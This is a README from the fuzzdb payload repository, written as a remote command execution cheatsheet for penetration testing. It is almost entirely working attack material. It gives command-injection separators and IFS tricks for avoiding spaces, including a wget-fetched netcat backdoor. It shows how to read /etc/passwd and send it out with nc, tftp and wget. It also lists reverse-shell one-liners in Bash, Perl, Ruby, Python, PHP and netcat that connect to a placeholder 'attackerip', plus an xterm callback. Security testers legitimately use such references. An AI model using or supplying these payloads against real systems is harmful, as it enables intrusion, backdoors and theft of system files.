fuzzdb/attack/os-cmd-execution/README.md
2016-10-04 09:13:29 -04:00

3.6 KiB

Remote Command Exec Cheatsheet

Executing Commands

Various ways of separating Commands:
blah;blah2

blah ^ blah 2

blah && blah2

FAIL || X

blah%0Dblah2%0Dblah3

`blah`

`blah & blah2`

Shell commands without spaces

Using Internal Field Separator (IFS):
Test for cmd injection without spaces:
sleep${IFS:0:1}20

Example IFS netcat backdoor without spaces:
{wget,http://attackerip/nc}
{chmod,+x,./nc}
{./nc,-l,-p,1234,-e,/bin/bash}

$IFS shell variable:
cat$IFS/etc/passwd
increment the first +1 to retreive the entire file, line by line
cat$IFS/etc/passwd|tail$IFS-n+1|head$IFS-n+1

Shell Variables:
CMD=$'cat\x20/etc/passwd';$CMD

shell variable, increment through file one line at a time:
increment the first +1 to retreive the entire file, line by line
SP=$'\x20';cat$SP/etc/passwd|tail$SP-n+1|head$SP-n+1

Exfiltrating Files / Data

FTP
Make a new text file, and echo and then redirect to FTP

NC
'nc -e /bin/sh'

NC
'echo /etc/passwd | nc host port'

TFTP
'echo put /etc/passwd | tftp host'

WGET:
'wget --post-file /etc/passwd'

One-Liner Reverse Shells

On the listener
$ nc -l -p 1234 -vvv'

On the remote host...

Bash:
$ bash -i >& /dev/tcp/attackerip/1234 0>&1

$ exec 5<>/dev/tcp/attackerip/1234
$ cat <&5 | while read line; do $line 2>&5 >&5; done

Perl
$ perl -e 'use Socket;$i="attackerip";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl for Windows target perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby
$ ruby -rsocket -e'f=TCPSocket.open("attackerip",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Python
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP
$ php -r '$sock=fsockopen("attackerip",1234);exec("/bin/sh -i <&3 >&3 2>&3");' (Assumes TCP uses file descriptor 3. It it doesn't work, try 4,5, or 6)

Netcat
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip 1234 >/tmp/f

Bash
bash -i >& /dev/tcp/attackerip/1234 0>&1

XTERM
To catch incoming xterm, start an open X Server on your system (:1 - which listens on TCP port 6001) with Xnest:

Xnest :1
Authorize the target IP's connection to you:

Run this OUTSIDE the Xnest:
xterm -display 127.0.0.1:1

Run this INSIDE the spawned xterm on the open X Server
xhost +targetip

Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:
xterm -display attackerip:1
or
DISPLAY=attackerip:0 xterm
It will try to connect back to you, attackerip, on TCP port 6001.

If the xterm path is not within the PATH environment variable, you need to specify its filepath. Solaris path example:
/usr/openwin/bin/xterm -display attackerip:1


More docs: /docs/attack-docs/remote-cmd-exfiltration/